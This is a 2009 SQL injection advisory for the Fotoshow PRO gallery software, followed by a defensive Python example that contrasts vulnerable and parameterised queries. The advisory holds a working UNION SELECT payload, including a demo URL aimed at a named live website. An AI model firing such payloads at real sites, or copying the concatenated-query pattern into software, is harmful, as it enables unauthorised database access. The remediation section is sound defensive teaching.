======================================================================================================================[_][-][X]

                     Fotoshow PRO™ (category) Remote SQL Injection Vulnerability

        =======       ------d-------m------       ====    ====
        ||  =         |      |(o o)|     |        ||      ||
        ||  =         ||      (~)      ||         ||      ||
        =======       /|\              ||         ||      ||
==========================================================================================================================

 Author          : darkmasking
 Date            : August, 15th 2009
 Contact         : darkmasking[at]gmail[dot]com
 Critical Level  : Dangerous (*RED)
--------------------------------------------------------------------------------------------------------------------------
 Affected software description :

 Software : Fotoshow PRO™
 Vendor   : http://www.fotoshowpro.com/
 Price    : $5,000 (USD) http://www.fotoshowpro.com/features.php \0_o/
==========================================================================================================================

 [~] SQLi POC

 [+] http://www.target.com/[path]/results.php?category=[SQli]

--------------------------------------------------------------------------------------------------------------------------

 [~] SQLi POC Demo

 [+] http://www.macduffeverton.com/stock/results.php?category=-9999 and 1=0 union select null,version(),null,null,null--

--------------------------------------------------------------------------------------------------------------------------

 [~] Greetz

 Sorry bro, I haven't got any friends yet, so this one is just for myself! (HAPPY 17th OF AUGUST CELEBRATION | May it be festive)

==========================================================================================================================
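The advisory only gives the injectable parameter and a proof-of-concept URL; it does not show the vendor's code. The following is an added example, not Fotoshow PRO's own code, written from the defender's side: it reproduces the flawed pattern the advisory implies (the `category` query-string value concatenated into SQL text) next to the hardened form (type enforcement plus a bound parameter), and runs both against a constructed in-memory SQLite table. The table name, columns and rows are assumptions; because SQLite is used instead of MySQL, the page's `version()` is replaced by SQLite's `sqlite_version()`, and the rest of the advisory's payload is kept as-is.

```python
import sqlite3

# Constructed stand-in for the gallery database. The real Fotoshow PRO schema
# is not on the page; table and column names here are assumptions.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE photos (id INTEGER, category INTEGER, "
        "title TEXT, file TEXT, caption TEXT)"
    )
    conn.executemany("INSERT INTO photos VALUES (?, ?, ?, ?, ?)", [
        (1, 3, "Harbour", "harbour.jpg", "Morning light"),
        (2, 3, "Dunes", "dunes.jpg", "Late afternoon"),
        (3, 7, "Skyline", "skyline.jpg", "Blue hour"),
    ])
    return conn

def vulnerable_lookup(conn, category):
    # The flawed pattern the advisory implies: the raw query-string value is
    # pasted into the SQL text, so a UNION can append attacker-chosen rows and
    # a trailing '--' comments out whatever the application meant to add.
    sql = ("SELECT id, category, title, file, caption FROM photos "
           "WHERE category=" + category)
    return conn.execute(sql).fetchall()

def safe_lookup(conn, category):
    # Hardened form: 'category' is an integer id, so enforce that type first
    # (a real handler would answer HTTP 400 on failure), then bind the value
    # as a parameter so the driver never treats it as SQL syntax.
    try:
        cat_id = int(category)
    except (TypeError, ValueError):
        return None
    sql = ("SELECT id, category, title, file, caption FROM photos "
           "WHERE category=?")
    return conn.execute(sql, (cat_id,)).fetchall()

# The advisory's payload, with version() swapped for SQLite's equivalent.
PAYLOAD = "-9999 and 1=0 union select null,sqlite_version(),null,null,null--"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", vulnerable_lookup(db, PAYLOAD))  # leaks the DB version
    print("hardened:  ", safe_lookup(db, PAYLOAD))        # rejected: None
    print("normal:    ", safe_lookup(db, "3"))            # the two category-3 rows
```

The integer cast alone would stop this particular payload, but the bound parameter is the part that holds up when the parameter is free text rather than an id; the two belong together. For a PHP application such as results.php the same shape is a cast (or `filter_var` with `FILTER_VALIDATE_INT`) followed by a PDO or mysqli prepared statement.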